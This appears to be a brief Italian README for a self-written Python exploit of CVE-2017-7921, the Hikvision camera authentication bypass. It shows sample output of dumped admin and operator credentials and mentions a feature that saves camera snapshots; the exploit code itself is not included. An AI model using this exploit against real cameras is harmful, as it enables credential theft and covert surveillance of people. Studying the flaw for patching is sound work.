
semplice riscrittura di CVE-2017-7921 in python fatta da me. solo per scopi educativi!
semplice riscrittura di CVE-2017-7921 in python fatta da me. solo per scopi educativi!
abbastanza semplice, non ho incluso controlli per cose come IP e controlli avanzati per la risposta e simili. L'ho testato su una telecamera su cui sono autorizzato a testarlo (nella mia rete locale) e sembra funzionare perfettamente.
#Output di esempio:
python 2017.py
found usernames: admin,defualt
admin:Pa$$W0rd
defualt:Xf07732479
Queste credenziali corrispondono a quelle che otterremmo usando lo stesso exploit su "msfconsole"
[*] User Credentials Information:
-----------------------------
User:admin | ID:1 | Role:Administrator | Password: Pa$$W0rd
User:defualt | ID:2 | Role:Operator | Password: Xf07732479
#fonti dettagli reali: https://medium.com/@k3yb0ard/when-you-pay-to-sell-your-own-privacy-a-technical-deep-dive-into-cve-2017-7921-hikvision-auth-576b581f4afe
cve: https://nvd.nist.gov/vuln/detail/cve-2017-7921
#aggiornamento
aggiunto anche lo snapshot che ti permette di ottenere uno snapshot da /Streaming/channels/1/picture e salvarlo in un file ip.jpg